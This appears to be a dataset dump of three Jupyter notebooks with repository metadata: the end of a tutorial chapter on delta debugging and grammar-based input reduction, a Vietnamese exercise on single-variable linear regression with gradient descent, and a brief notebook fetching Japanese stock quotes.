"_____no_output_____"
],
[
"grammar_reducer = GrammarReducer(\n eval_mystery,\n EarleyParser(EXPR_GRAMMAR),\n log_test=True)\ngrammar_reducer.reduce(expr_input)",
"Test #1 '(2 * 3)' 7 FAIL\nTest #2 '2 * 3' 5 PASS\nTest #3 '3' 1 PASS\nTest #4 '2' 1 PASS\nTest #5 '(3)' 3 FAIL\n"
]
],
[
[
"Success! In only five steps, our `GrammarReducer` reduces the input to the minimum that causes the failure. Note how all tests are syntactically valid by construction, avoiding the `UNRESOLVED` outcomes that cause delta debugging to stall.",
"_____no_output_____"
],
[
"### A Depth-Oriented Strategy",
"_____no_output_____"
],
[
"Even if five steps are already good, we can still do better. If we look at the log above, we see that after test `#2`, where the input (tree) is reduced to `2 * 3`, our `GrammarReducer` first tries to replace the tree with `2` and `3`, which are the alternate `<term>` subtrees. This may work, of course; but if there are many possible subtrees, our strategy will spend quite some time trying one after the other.",
"_____no_output_____"
],
[
"Delta debugging, as introduced above, follows the idea of trying to cut inputs approximately in half, and thus quickly proceeds towards a minimal input. By replacing a tree with much smaller subtrees, we _could_ possibly reduce a tree significantly, but may need several attempts to do so. A better strategy is to only consider _large_ subtrees first – both for the subtree replacement as well as for alternate expansions. To find such _large_ subtrees, we limit the _depth_ by which we search for possible replacements in the subtree – first, by looking at the direct descendants, later at lower descendants.",
"_____no_output_____"
],
[
"This is the role of the `depth` parameter used in `subtrees_with_symbol()` and passed through the invoking functions. If set, _only_ symbols at the given depth are returned. Here's an example, starting again with our derivation tree `derivation_tree`:",
"_____no_output_____"
]
],
[
[
"grammar_reducer = GrammarReducer(\n mystery,\n EarleyParser(EXPR_GRAMMAR),\n log_reduce=True)",
"_____no_output_____"
],
[
"all_terminals(derivation_tree)",
"_____no_output_____"
],
[
"display_tree(derivation_tree)",
"_____no_output_____"
]
],
[
[
"At a depth of 1, there is no `<term>` symbol:",
"_____no_output_____"
]
],
[
[
"[all_terminals(t) for t in grammar_reducer.subtrees_with_symbol(\n derivation_tree, \"<term>\", depth=1)]",
"_____no_output_____"
]
],
[
[
"At a depth of 2, we have the `<term>` subtree on the left hand side:",
"_____no_output_____"
]
],
[
[
"[all_terminals(t) for t in grammar_reducer.subtrees_with_symbol(\n derivation_tree, \"<term>\", depth=2)]",
"_____no_output_____"
]
],
[
[
"At a depth of 3, we have the `<term>` subtree on the right hand side:",
"_____no_output_____"
]
],
[
[
"[all_terminals(t) for t in grammar_reducer.subtrees_with_symbol(\n derivation_tree, \"<term>\", depth=3)]",
"_____no_output_____"
]
],
[
[
"The idea is now to start with a depth of 0, subsequently increasing it as we proceed:",
"_____no_output_____"
]
],
[
[
"class GrammarReducer(GrammarReducer):\n def reduce_tree(self, tree):\n depth = 0\n while depth < max_height(tree):\n reduced = self.reduce_subtree(tree, tree, depth)\n if reduced:\n depth = 0 # Start with new tree\n else:\n depth += 1 # Extend search for subtrees\n return tree ",
"_____no_output_____"
],
[
"grammar_reducer = GrammarReducer(\n mystery,\n EarleyParser(EXPR_GRAMMAR),\n log_test=True)\ngrammar_reducer.reduce(expr_input)",
"Test #1 '(2 * 3)' 7 FAIL\nTest #2 '(3)' 3 FAIL\nTest #3 '3' 1 PASS\n"
]
],
[
[
"We see that a depth-oriented strategy needs even fewer steps in our setting.",
"_____no_output_____"
],
[
"### Comparing Strategies\n\nWe close by demonstrating the difference between text-based delta debugging and our grammar-based reduction. We build a very long expression:",
"_____no_output_____"
]
],
[
[
"from GrammarFuzzer import GrammarFuzzer",
"_____no_output_____"
],
[
"long_expr_input = GrammarFuzzer(EXPR_GRAMMAR, min_nonterminals=100).fuzz()\nlong_expr_input",
"_____no_output_____"
]
],
[
[
"With grammars, we need only a handful of tests to find the failure-inducing input:",
"_____no_output_____"
]
],
[
[
"from Timer import Timer",
"_____no_output_____"
],
[
"grammar_reducer = GrammarReducer(eval_mystery, EarleyParser(EXPR_GRAMMAR))\nwith Timer() as grammar_time:\n print(grammar_reducer.reduce(long_expr_input))",
"(9)\n"
],
[
"grammar_reducer.tests",
"_____no_output_____"
],
[
"grammar_time.elapsed_time()",
"_____no_output_____"
]
],
[
[
"Delta debugging, in contrast, requires orders of magnitude more tests (and consequently, time). Again, the reduction is not closely as perfect as it is with the grammar-based reducer.",
"_____no_output_____"
]
],
[
[
"dd_reducer = DeltaDebuggingReducer(eval_mystery)\nwith Timer() as dd_time:\n print(dd_reducer.reduce(long_expr_input))",
"((2 - 1 - 2) * 8 + (5) - (4)) / ((2) * 3) * (9) / 3 / 1 - 8\n"
],
[
"dd_reducer.tests",
"_____no_output_____"
],
[
"dd_time.elapsed_time()",
"_____no_output_____"
]
],
[
[
"We see that if an input is syntactically complex, using a grammar to reduce inputs is the best way to go.",
"_____no_output_____"
],
[
"## Synopsis\n\nA _reducer_ takes a failure-inducing input and reduces it to the minimum that still reproduces the failure. This chapter provides `Reducer` classes that implement such reducers.",
"_____no_output_____"
],
[
"Here is a simple example: An arithmetic expression causes an error in the Python interpreter:",
"_____no_output_____"
]
],
[
[
"!python -c 'x = 1 + 2 * 3 / 0'",
"Traceback (most recent call last):\r\n File \"<string>\", line 1, in <module>\r\nZeroDivisionError: division by zero\r\n"
]
],
[
[
"Can we reduce this input to a minimum? To use a `Reducer`, one first has to build a `Runner` whose outcome is `FAIL` if the precise error occurs. We therefore build a `ZeroDivisionRunner` whose `run()` method will specifically return a `FAIL` outcome if a `ZeroDivisionError` occurs.",
"_____no_output_____"
]
],
[
[
"from Fuzzer import ProgramRunner",
"_____no_output_____"
],
[
"class ZeroDivisionRunner(ProgramRunner):\n \"\"\"Make outcome 'FAIL' if ZeroDivisionError occurs\"\"\"\n def run(self, inp=\"\"):\n result, outcome = super().run(inp)\n if result.stderr.find('ZeroDivisionError') >= 0:\n outcome = 'FAIL'\n return result, outcome",
"_____no_output_____"
]
],
[
[
"If we feed this expression into a `ZeroDivisionRunner`, it will produce an outcome of `FAIL` as designed.",
"_____no_output_____"
]
],
[
[
"python_input = \"x = 1 + 2 * 3 / 0\"\npython_runner = ZeroDivisionRunner(\"python\")\nresult, outcome = python_runner.run(python_input)\noutcome",
"_____no_output_____"
]
],
[
[
"Delta Debugging is a simple and robust reduction algorithm. We can tie a `DeltaDebuggingReducer` to this runner, and have it determine the substring that causes the `python` program to fail:",
"_____no_output_____"
]
],
[
[
"dd = DeltaDebuggingReducer(python_runner)\ndd.reduce(python_input)",
"_____no_output_____"
]
],
[
[
"The input is reduced to the maximum: We get the essence of the division by zero.",
"_____no_output_____"
],
[
"## Lessons Learned\n\n* Reducing failure-inducing inputs to a minimum is helpful for testing and debugging.\n* _Delta debugging_ is a simple and robust algorithm to easily reduce test cases.\n* For syntactically complex inputs, _grammar-based reduction_ is much faster and yields better results.",
"_____no_output_____"
],
[
"## Next Steps\n\nOur next chapter focuses on [Web GUI Fuzzing](WebFuzzer.ipynb), another domain where generating and reducing test cases is central.",
"_____no_output_____"
],
[
"## Background\n\nThe \"lexical\" delta debugging algorithm discussed here stems from \\cite{Zeller2002}; actually, this is the exact Python implementation as used by Zeller in 2002. The idea of systematically reducing inputs has been discovered a number of times, although not as automatic and generic as delta debugging. \\cite{Slutz1998}, for instance, discusses systematic reduction of SQL statements for SQL databases; the general process as manual work is well described by \\cite{Kernighan1999}.",
"_____no_output_____"
],
[
"The deficits of delta debugging as it comes to syntactically complex inputs were first discussed in *compiler testing*, and _reducing tree inputs_ rather than string inputs was quickly discovered as an alternative. *Hierarchical Delta Debugging* (*HDD*) \\cite{Misherghi2006} applies delta debugging on subtrees of a parse tree, systematically reducing a parse tree to a minimum. _Generalized Tree Reduction_ \\cite{Herfert2017} generalizes this idea to apply arbitrary _patterns_ such as replacing a term by a compatible term in a subtree, as `subtrees_with_symbol()` does. Using _grammars_ to reduce inputs was first implemented in the _Perses_ tool \\cite{Sun2018}; our algorithm implements very similar strategies. Searching for alternate expansions (as `alternate_reductions()`) is a contribution of the present chapter.",
"_____no_output_____"
],
[
"While `GrammarReducer` is a generic approach that can be parameterized with an arbitrary grammar, _language-specific_ approaches can do a much better job for the language at hand. *C-Reduce* \\cite{Regehr2012} is a reducer specifically targeting the reduction of programming languages. Besides reductions in the style of delta debugging or tree transformations, C-Reduce comes with more than 30 source-to-source transformations that replace aggregates by scalars, remove function parameters at a definition and all call sites, change functions to return `void` and deleting all `return` statements, and many more. While specifically instantiated for the C language (and used for testing C compilers), these principles extend to arbitrary programming languages following an ALGOL-like syntax. When testing a compiler, C-Reduce is the tool to go for.",
"_____no_output_____"
],
[
"This [blog post](https://www.drmaciver.com/2019/01/notes-on-test-case-reduction/) by David McIver contains lots of insights on how to apply reduction in practice, in particular multiple runs with different abstraction levels.",
"_____no_output_____"
],
[
"## Exercises\n\nHow to best reduce inputs is still an underdeveloped field of research, with lots of opportunities.",
"_____no_output_____"
],
[
"### Exercise 1: Mutation-Based Fuzzing with Reduction\n\nWhen fuzzing with a population, it can be useful to occasionally _reduce_ the length of each element, such that future descendants are shorter, too, which typically speeds up their testing.\n\nConsider the `MutationFuzzer` class from [the chapter on mutation-based fuzzing](MutationFuzzer.ipynb). \nExtend it such that whenever a new input is added to the population, it is first reduced using delta debugging.",
"_____no_output_____"
],
[
"**Solution.** Left to the reader.",
"_____no_output_____"
],
[
"### Exercise 2: Reduction by Production\n\nGrammar-based input reduction, as sketched above, might be a good algorithm, but is by no means the only alternative. One interesting question is whether \"reduction\" should only be limited to elements already present, or whether one would be allowed to also create _new_ elements. These would not be present in the original input, yet still allow to produce a much smaller input that would still reproduce the original failure.",
"_____no_output_____"
],
[
"As an example, consider the following grammar:\n\n```\n<number> ::= <float> | <integer> | <not-a-number>\n<float> ::= <digits>.<digits>\n<integer> ::= <digits>\n<not-a-number> ::= NaN\n<digits> ::= [0-9]+\n```\n\nAssume the input `100.99` fails. We might be able to reduce it to a minimum of, say, `1.9`. However, we cannot reduce it to an `<integer>` or to `<not-a-number>`, as these symbols do not occur in the original input. By allowing to _create_ alternatives for these symbols, we could also tests inputs such as `1` or `NaN` and further generalize the class of inputs for which the program fails.",
"_____no_output_____"
],
[
"Create a class `GenerativeGrammarReducer` as subclass of `GrammarReducer`; extend the method `reduce_subtree()` accordingly.",
"_____no_output_____"
],
[
"**Solution.** Left to the reader.",
"_____no_output_____"
],
[
"### Exercise 3: The Big Reduction Shoot-Out\n\nCreate a _benchmark_ for the grammars already defined earlier, consisting of:\n\n1. A set of _inputs_, produced from these very grammars using `GrammarFuzzer` and derivatives;\n2. A set of _tests_ which check for the occurrence of individual symbols as well as pairs and triples of these symbols:\n * Tests should be _unresolved_ if the input is not syntactically valid;\n * Tests should _fail_ if the symbols (or pairs or triples thereof) occur;\n * Tests should _pass_ in all other cases.\n \nCompare delta debugging and grammar-based debugging on the benchmark. Implement HDD \\cite{Misherghi2006} and _Generalized Tree Reduction_ \\cite{Herfert2017} and add them to your comparison. Which approach performs best, and under which circumstances?",
"_____no_output_____"
],
[
"**Solution.** Left to the reader.",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
]
] |
e7078927712c388eacc8e9da22af0d24232c0e28 | 30,089 | ipynb | Jupyter Notebook | Week 2/Assignment/Assignment-Linear-Regression-with-One-Variable.ipynb | thanhhff/AIVN-Course-AI-For-Everyone | e8e582dea304341f0c03cedb920bcd1d450e5a9c | [
"MIT"
] | 25 | 2019-11-24T03:15:22.000Z | 2021-12-29T07:23:19.000Z | Week 2/Assignment/Assignment-Linear-Regression-with-One-Variable.ipynb | hyperstar1/AIVN-Machine-Learning | e8e582dea304341f0c03cedb920bcd1d450e5a9c | [
"MIT"
] | 1 | 2019-12-03T10:44:48.000Z | 2019-12-03T10:44:48.000Z | Week 2/Assignment/Assignment-Linear-Regression-with-One-Variable.ipynb | hyperstar1/AIVN-Machine-Learning | e8e582dea304341f0c03cedb920bcd1d450e5a9c | [
"MIT"
] | 13 | 2019-11-24T04:33:42.000Z | 2022-03-02T10:58:14.000Z | 49.245499 | 13,804 | 0.713583 | [
[
[
"## Programming Assignment: Linear Regression with One Variable \n\nChào mừng các bạn đến với bài tập lập trình Linear Regression with One Variable (Hồi quy tuyến tính đơn biến). Trước khi thực hiện bài tập này, các bạn nên học kỹ các kiến thức lý thuyết. Nếu có bất kỳ câu hỏi hay vấn đề nào xảy ra, các bạn hãy để lại comment trực tiếp bên dưới bài đăng hoặc liên hệ qua Fanpage AIVIETNAM.\n\nTrong bài tập này, các bạn sẽ thực hiện dự đoán lợi nhuận từ việc bán hàng từ dân số trong thành phố. \n\n### Hướng dẫn làm bài \n- Trong bài tập này bạn sẽ sử dụng Python 3.\n- Cố gắng không sử dụng các vòng lặp (for, while). \n- Hãy sử dụng các hàm của thư viện numpy.\n- Sau khi bạn viết Code của mình xong, hãy chạy dòng Code đó để xem kết quả bên dưới. \n\nCác bạn sẽ bắt đầu Code trong phần `### START CODE HERE ###` và `### END CODE HERE ###`. Các bạn nhớ đừng sửa bất kỳ dòng Code nào bên ngoài những câu lệnh này. \n\nSau khi viết xong Code của bạn, bạn hãy ấn \"SHIFT\"+\"ENTER\" để thực hiện chạy lệnh của Cell đó. \n\nTrong phần Code: các bạn hãy cố gắng thực hiện ít dòng Code nhất theo chỉ định \"(≈ X lines of code)\". Mặc dù đây không phải là hạn chế về số dòng Code của bạn, nhưng hãy tối ưu sao cho ít nhất có thể.",
"_____no_output_____"
]
],
[
[
"# Import thư viện \n%matplotlib inline\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn; seaborn.set_style(\"whitegrid\")",
"_____no_output_____"
]
],
[
[
"### 1. Plotting the Data (Hiển thị dữ liệu)\n\nTrước khi thực hiện bất cứ nhiệm vụ nào, việc hiển thi dữ liệu và trực quan hoá sẽ giúp bạn phần nào hình dung được sự phân bố của dữ liệu.",
"_____no_output_____"
]
],
[
[
"# Import dữ liệu từ file .txt\ndata = 'data/ex2data.txt'\n\n# Đọc file bằng hàm numpy.loadtxt\nx, y = np.loadtxt(data, delimiter=',', usecols=(0, 1), unpack=True)\n\n# Xem 5 giá trị đầu tiên \nx[:5], y[:5]",
"_____no_output_____"
]
],
[
[
"Biểu đồ phân tán dữ liệu",
"_____no_output_____"
]
],
[
[
"plt.scatter(x, y, marker='x', c='r', s=20)\nplt.xlabel(\"Population of City in 10,000s\")\nplt.ylabel(\"Profit in $10,000s\");",
"_____no_output_____"
]
],
[
[
"Những dòng lệnh sau sử dụng thư viện **scikit-learn** để tìm ra kết quả bài toán. Các bạn không cần quá bận tâm về điều này, nó chỉ là một phép thử để xem kết quả chúng ta thực hiện đúng hay sai.",
"_____no_output_____"
]
],
[
[
"from sklearn.linear_model import LinearRegression\nmodel = LinearRegression(fit_intercept=True)\n\nX = np.ones((len(x), 2))\nX[:,1] = x\n\nmodel.fit(X[:,1][:, np.newaxis], y)\n\nxfit = np.linspace(5, 23, 1000)\nyfit = model.predict(xfit[:, np.newaxis])\n\nplt.scatter(X[:,1], y, marker='x', c='r', s=20, label='data')\nplt.plot(xfit, yfit, label='h(x) = %0.2f + %0.2fx'%(model.intercept_, model.coef_[0]))\nplt.xlabel(\"Population of City in 10,000s\")\nplt.ylabel(\"Profit in $10,000s\")\npst = plt.legend(loc='lower right', frameon=True)\npst.get_frame().set_edgecolor('k');\nprint(\"Model intercept: \", model.intercept_)\nprint(\"Model slope: \", model.coef_[0])",
"_____no_output_____"
]
],
[
[
"### 2. Gradient Descent\n#### 2.1 Khởi tạo giá trị theta",
"_____no_output_____"
]
],
[
[
"iters = 3000\nlearning_rate = 0.01\n\n# Khởi tạo theta0, theta1 ban đầu ngẫu nhiên \n# Hàm numpy.random.seed sẽ giúp kết quả random không thay đổi khi chạy lại \nnp.random.seed(2020)\n\n# Sử dụng hàm numpy.random.randn()\n### START CODE HERE ### (≈ 2 line of code)\ntheta0 = None\ntheta1 = None\n### END CODE HERE ###",
"_____no_output_____"
],
[
"print('Theta 0: ', theta0)\nprint('Theta 1: ', theta1)",
"_____no_output_____"
]
],
[
[
"**Đầu ra kỳ vọng**: \n<table>\n <tr> \n <td> Theta 0: </td> \n <td> -1.7688457055759508</td>\n </tr>\n <tr> \n <td> Theta 1: </td> \n <td> 0.07555227120810952</td> \n </tr>\n</table> ",
"_____no_output_____"
]
],
[
[
"# Đếm giá trị số lượng dữ liệu \n\n### START CODE HERE ### (≈ 1 line of code)\nm = None\n### END CODE HERE ###\n\nprint('Số lượng: ', m)",
"_____no_output_____"
]
],
[
[
"**Đầu ra kỳ vọng**: \n<table>\n <tr> \n <td> Số lượng: </td> \n <td> 97 </td>\n </tr>\n</table> ",
"_____no_output_____"
],
[
"#### 2.2 Tính Cost Function J(θ)\n\n<center>$J(\\theta_0, \\theta_1) = \\dfrac{1}{2m} \\sum_{i=1}^m {(h_{\\theta}(x_i) - y)^2} = \\dfrac{1}{2m} \\sum_{i=1}^m {((\\theta_0 + \\theta_1{x}) - y)^2}$</center>\n\nGợi ý: sử dụng hàm `numpy.sum` để tính tổng ",
"_____no_output_____"
]
],
[
[
"def cost_function(x, y, theta0, theta1):\n \n ### START CODE HERE ### (≈ 1 line of code)\n total_error = None\n ### END CODE HERE ###\n\n return total_error",
"_____no_output_____"
],
[
"# Với 2 giá trị theta0, theta1 random theo như ở trên \ncost_function(x, y, theta0, theta1)",
"_____no_output_____"
]
],
[
[
"**Đầu ra kỳ vọng**: \n<table>\n <tr> \n <td>total_error: 38.171782006110064 </td> \n </tr>\n</table> ",
"_____no_output_____"
],
[
"#### 2.3 Gradient Descent\n\nCập nhật tham số (weight)\n\n> $\\theta_0 := \\theta_0 - \\alpha \\dfrac{1}{m} \\sum_{i=1}^m {(h_{\\theta}(x_i) - y)} $\n>\n> $\\theta_1 := \\theta_1 - \\alpha \\dfrac{1}{m} \\sum_{i=1}^m {((h_{\\theta}(x_i) - y)*x_i)} $\n",
"_____no_output_____"
]
],
[
[
"def update_weights(x, y, theta0, theta1, learning_rate):\n\n theta0_deriv = 0\n theta1_deriv = 0\n \n # Thực hiện tính đạo hàm và Sum trước\n for i in range(m):\n ### START CODE HERE ### (≈ 2 line of code) \n theta0_deriv += None\n theta1_deriv += None\n ### END CODE HERE ###\n \n # Thực hiện di chuyển ngược dấu đạo hàm \n \n ### START CODE HERE ### (≈ 2 line of code) \n theta0 -= None\n theta1 -= None\n ### END CODE HERE ###\n\n return theta0, theta1",
"_____no_output_____"
],
[
"update_weights(x, y, theta0, theta1, learning_rate)",
"_____no_output_____"
]
],
[
[
"**Đầu ra kỳ vọng**: \n<table>\n <tr> \n <td> theta0: -1.6989308122307667 </td> \n </tr>\n <tr> \n <td> theta1: 0.8116725128922441 </td> \n </tr> \n</table> ",
"_____no_output_____"
],
[
"### 3 Thực hiện train",
"_____no_output_____"
]
],
[
[
"def train(x, y, theta0, theta1, learning_rate, iters):\n cost_history = []\n\n for i in range(iters):\n \n ### START CODE HERE ### (≈ 1 line of code) \n theta0, theta1 = None\n ### END CODE HERE ###\n \n # Tính hàm cost\n \n ### START CODE HERE ### (≈ 1 line of code)\n cost = None\n ### END CODE HERE ###\n \n # Lưu giá trị cost\n cost_history.append(cost)\n\n return theta0, theta1, cost_history",
"_____no_output_____"
]
],
[
[
"Train: ",
"_____no_output_____"
]
],
[
[
"### START CODE HERE ### (≈ 1 line of code)\ntheta0, theta1, cost_history = None\n### END CODE HERE ###\n\n# Hiển thị giá trị theta0, theta1 học được sau quá trình train\nprint('h(x) = %0.2f + %0.2fx'%(theta0, theta1))",
"_____no_output_____"
]
],
[
[
"**Đầu ra kỳ vọng**: \n<table>\n <tr> \n <td> h(x) = -3.89 + 1.19x </td> \n </tr>\n</table> ",
"_____no_output_____"
]
],
[
[
"# Vẽ hàm lỗi \nplt.plot(cost_history)",
"_____no_output_____"
],
[
"# Đường thẳng linear regression tìm được sau khi huấn luyện\nplt.scatter(x, y, marker='x', c='r', s=20, label='data')\nplt.plot(xfit, yfit, label='h(x) = %0.2f + %0.2fx'%(theta0, theta1))\nplt.xlabel(\"Population of City in 10,000s\")\nplt.ylabel(\"Profit in $10,000s\")\npst = plt.legend(loc='lower right', frameon=True)\npst.get_frame().set_edgecolor('k');",
"_____no_output_____"
]
],
[
[
"### 4. Thực hiện dự đoán \n\nHàm dự đoán: \n<center>$\\hat{y} = h_{\\theta}(x) = \\theta_0 + \\theta_1{x}$ </center>",
"_____no_output_____"
]
],
[
[
"def predict(x, theta0, theta1):\n \n ### START CODE HERE ### (≈ 1 line of code)\n y_hat = None\n ### END CODE HERE ###\n \n return y_hat",
"_____no_output_____"
]
],
[
[
"Thực hiện dự đoán doanh thu ở thành phố có 35000 và 70000 dân !",
"_____no_output_____"
]
],
[
[
"print(\"Profit for pop. 35000: %0.2f\"%(predict(3.5, theta0, theta1)*10000))\nprint(\"Profit for pop. 70000: %0.2f\"%(predict(7, theta0, theta1)*10000))",
"_____no_output_____"
]
],
[
[
"**Đầu ra kỳ vọng**: \n<table>\n <tr> \n <td> Profit for pop. 35000: 2862.47 </td> \n </tr>\n <tr> \n <td> Profit for pop. 70000: 44583.89 </td> \n </tr> \n</table> ",
"_____no_output_____"
],
[
"### 5. Visualizing J(θ)\n\nTrực quan hoá Cost Function",
"_____no_output_____"
]
],
[
[
"# Tạo Grid để tính giá trị Cost \ntheta0_vals = np.linspace(-10, 10, 80)\ntheta1_vals = np.linspace(-1, 4, 80)\n\n# Khởi tạo J_vals thành matrix 0\nJ_vals = np.zeros((len(theta0_vals), len(theta1_vals)))\n\n# Điền giá trị vào J_vals\nfor i in np.arange(theta0_vals.size):\n for j in np.arange(theta1_vals.size):\n J_vals[i, j] = cost_function(x, y, theta0_vals[i], theta1_vals[j])",
"_____no_output_____"
],
[
"from mpl_toolkits.mplot3d import Axes3D\n\nfig = plt.figure(figsize=(14, 5))\nfig.subplots_adjust(wspace=0.3)\nax1 = fig.add_subplot(121, projection='3d')\nax2 = fig.add_subplot(122)\n\ntheta_0, theta_1 = np.meshgrid(theta0_vals, theta1_vals)\n\n# Surface plot:\nax1.set_title('Surface plot')\nax1.plot_surface(theta_1, theta_0, J_vals.T, cmap='jet', rstride=3, cstride=3, antialiased=True)\nax1.view_init(elev=20, azim=318)\nax1.set_xlabel(r'$\\theta_1$', labelpad=8)\nax1.set_xlim(4,-1)\nax1.set_ylabel(r'$\\theta_0$', labelpad=8)\nax1.set_yticks(np.linspace(-10, 10, 5))\nax1.set_zlabel(r'$J(\\theta)$', labelpad=8);\n\n# Contour plot:\nax2.set_title('Contour plot, showing minimum')\nax2.contour(theta_0, theta_1, J_vals.T, np.logspace(-2, 3, 20), cmap='jet')\nax2.scatter(theta0, theta1, marker='x', color='r', s=40)\nax2.set_xlabel(r'$\\theta_0$')\nax2.set_ylabel(r'$\\theta_1$')\nax2.set_yticks(np.arange(-1,4.5,0.5));",
"_____no_output_____"
]
],
[
[
"**Đầu ra kỳ vọng:**\n\n<img src=\"data/vi-J.png\" style=\"width:60%;height:60%;\">\n",
"_____no_output_____"
],
[
"### Tổng kết\n\nThông qua bài tập này, các bạn đã nắm vững các kiến thức về:\n\n- Linear Regression with One Variable (Hồi quy tuyến tính đơn biến)\n- Gradient Descent cho hàm đơn biến\n- Tính Cost Function J(θ)\n\n\nCác bạn hãy cố gắng sử dụng hàm của thư viện numpy để việc tính toán dễ dàng hơn.\n\nVới hàm đơn biến, việc tính toán còn đơn giản. Trong bài tiếp theo, chúng ta sẽ thực hiện trên hàm đa biến và thực hiện vecto hoá dữ liệu. ",
"_____no_output_____"
],
[
"### Tài liệu tham khảo \n\n[1] [Machine Learning – Programming: Linear Regression](http://codewithmax.com/2017/09/21/machine-learning-programming-exercise-1-linear-regression/)",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown",
"markdown"
]
] |
e707909c2309f198e05a0fbc3fccc6fe05684abc | 1,970 | ipynb | Jupyter Notebook | docs/test_rakten_rss.ipynb | zaq9/rakuten_rss | bee8fb47d42ea0071025c7abe9d71a59b3da13b5 | [
"MIT"
] | 5 | 2019-02-17T04:12:49.000Z | 2021-06-20T03:34:14.000Z | docs/test_rakten_rss.ipynb | hermitcrab56/rakuten_rss | bee8fb47d42ea0071025c7abe9d71a59b3da13b5 | [
"MIT"
] | null | null | null | docs/test_rakten_rss.ipynb | hermitcrab56/rakuten_rss | bee8fb47d42ea0071025c7abe9d71a59b3da13b5 | [
"MIT"
] | 4 | 2019-02-17T05:34:49.000Z | 2022-03-06T15:59:54.000Z | 16.554622 | 60 | 0.453807 | [
[
[
"from rakuten_rss import rss,rss_dict,fetch_open",
"_____no_output_____"
],
[
"rss('9502.T', '始値')\n",
"_____no_output_____"
],
[
"rss('9501.T', '始値')\n\n\n",
"_____no_output_____"
],
[
"fetch_open(9983)",
"_____no_output_____"
],
[
"rss_dict('9502.T', '始値','銘柄名称','現在値')",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code"
]
] |
e70791826b0729846c33dbf40f0286d85f516cc0 | 36,727 | ipynb | Jupyter Notebook | organize_test_data.ipynb | dchiasson/kinetic_codec | ac9ee223980937af4bdd35b044e6d620bfcb2a1e | [
"MIT"
